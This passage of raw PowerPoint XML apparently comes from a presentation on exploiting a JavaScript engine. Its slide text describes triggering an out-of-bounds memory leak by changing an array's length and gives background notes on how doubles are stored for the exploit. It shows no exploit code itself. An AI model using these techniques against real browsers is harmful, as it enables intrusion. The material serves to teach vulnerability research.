            <a:ext cx="10295910" cy="52322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a:t>I understand that it is corrupt in the NUMERIC_DICTIONARY_TYPE and modify the source code to get the following result.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>I modified the length value of the array object to cause the OOB, and you can see the OOB memory leak as follows.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="그림 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C95BB475-2FCA-4A5F-B13E-658FF2AB30DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="381110" y="1389401"/>
            <a:ext cx="3058198" cy="5124881"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="그림 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECB87F96-E4C6-42C5-A92C-CEA54080382A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3765943" y="1389401"/>
            <a:ext cx="3003716" cy="5124881"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="그림 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F83CD907-ED55-4FEB-B73A-D7C8DA7B6B63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7096294" y="1389401"/>
            <a:ext cx="3349893" cy="2184565"/>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12" name="직사각형 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3A28625-DCA8-4A66-BECB-47169A78D129}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323386" y="1389401"/>
            <a:ext cx="3172600" cy="3918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1FDB059-C2B2-4D24-87F7-D715E17387E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="917838" y="3570967"/>
            <a:ext cx="2430966" cy="253916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1050">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The first loop in the previous chapter.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1050">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="그룹 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0A2AC2C-ECD0-49F3-BC68-442C1280BFEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1458131" y="5522384"/>
            <a:ext cx="1329674" cy="180922"/>
            <a:chOff x="1481861" y="5552656"/>
            <a:chExt cx="1454340" cy="180922"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="직사각형 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DD81A0C-67D6-4475-9B8E-606450E92BA8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1690050" y="5552656"/>
              <a:ext cx="1246151" cy="18092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bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>OOB is triggered</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15" name="화살표: 왼쪽 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3ED8C3E-F769-49F0-B91D-5AAB4B3A7F40}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1481861" y="5597886"/>
              <a:ext cx="207322" cy="9046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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85EB2BB3-E3FC-4782-99EE-FCA6E7E8C7A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7631733" y="3824883"/>
            <a:ext cx="4179157" cy="2498966"/>
            <a:chOff x="7421132" y="3923465"/>
            <a:chExt cx="4179157" cy="2498966"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="TextBox 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15B63677-9211-49B3-8FD2-8F952D34E4A5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7421132" y="3923465"/>
              <a:ext cx="4179157" cy="276999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Do you want to see the source code how I got this result?</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="TextBox 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C06B71B7-88FE-41B5-B9DD-F6D8237038DB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7655332" y="5678272"/>
              <a:ext cx="3710759" cy="307777"/>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ltLang="ko-KR" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Do you want to continue playing the game?</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="34" name="그룹 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A88CDC62-9A58-4411-B9A9-9C3B5F314D24}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8532132" y="4327422"/>
              <a:ext cx="1957161" cy="1249691"/>
              <a:chOff x="7167633" y="4504779"/>
              <a:chExt cx="1957161" cy="1249691"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="36" name="그림 35">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{595F8D48-C0BA-400E-AB20-36D70F2B0CDD}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId7"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="7167633" y="4504779"/>
                <a:ext cx="1957161" cy="1249691"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst>
                <a:softEdge rad="112500"/>
              </a:effectLst>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="38" name="그림 37" descr="동물이(가) 표시된 사진&#10;&#10;자동 생성된 설명">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6ED3833C-EDC9-4639-8CB2-84FD05DFFE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37590" y="4605938"/>
                <a:ext cx="1417247" cy="523686"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:effectLst>
                <a:glow rad="139700">
                  <a:srgbClr val="4B8293">
                    <a:alpha val="40000"/>
                  </a:srgbClr>
                </a:glow>
              </a:effectLst>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="TextBox 34">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1658958-15AC-42AF-B4B5-A5088B8CFD73}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9033528" y="6114654"/>
              <a:ext cx="954364" cy="307777"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Yes</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="92D050"/>
                  </a:solidFill>
                  <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1400">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>or</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="92D050"/>
                  </a:solidFill>
                  <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>No</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="직사각형 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{850EB33D-DFF0-4C0F-9094-34C5394A957C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1585522" y="5677518"/>
            <a:ext cx="1673066" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>before entering the second loop in the previous chapter.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="슬라이드 번호 개체 틀 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB31CA06-4252-4D65-A762-458B55E18183}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F3ECD9F8-CFA2-4FC9-86A0-B66D202A3856}" type="slidenum">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>/23</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="날짜 개체 틀 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22F1DF54-51B0-479F-B6CA-A02DC154704C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D29AD462-314C-4FC3-9EF3-55709FB6D035}" type="datetime1">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2019-11-28</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="466758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0F93870A-9D90-4166-B36D-200E4BFF727E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="381110" y="1389400"/>
            <a:ext cx="5283884" cy="5131407"/>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4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0962403-B5F4-4A33-9B04-6662D25D9260}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611942" y="129722"/>
            <a:ext cx="4125658"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Prior knowledge for exploits</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400">
              <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRP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7" y="866181"/>
            <a:ext cx="11729723" cy="52322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a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>To understand the exploit code you need some prior knowledge. As you can see, if it is not a Small Integer, the JavaScript array object is stored as an 8-byte fixed double array type. (BigInt is also 8 bytes)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="직사각형 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32412F61-3D5F-43D6-9256-1FE1C05BBFB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2909120" y="1869327"/>
            <a:ext cx="1613213" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1.1 != 0x9999999a</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200">
              <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="직사각형 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1985BF4B-2E6E-4C28-B74B-F5A1AF642ED5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="1612900"/>
            <a:ext cx="219075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11B58076-CA45-4544-9E8A-FB197DA249BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="2377053"/>
            <a:ext cx="2190750" cy="1686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3E8A280B-C2C8-4A4A-ACA4-AD0FB3C78A3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="4063999"/>
            <a:ext cx="2190750" cy="4953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CC335F4-4AF9-4AD7-ACDD-B4F44E865BD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2911228" y="3087825"/>
            <a:ext cx="2552945" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>0x41414141 = 0x41d0505050400000</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="직사각형 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44640DAC-847E-424A-B10F-DCBA0617BC0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2909119" y="4078292"/>
            <a:ext cx="2498081" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>0x9999999a != 1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>0x3ff19999 is the ODDBALL_TYPE</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="직사각형 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FC65284-08A1-4344-B76C-14A5285E1A4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
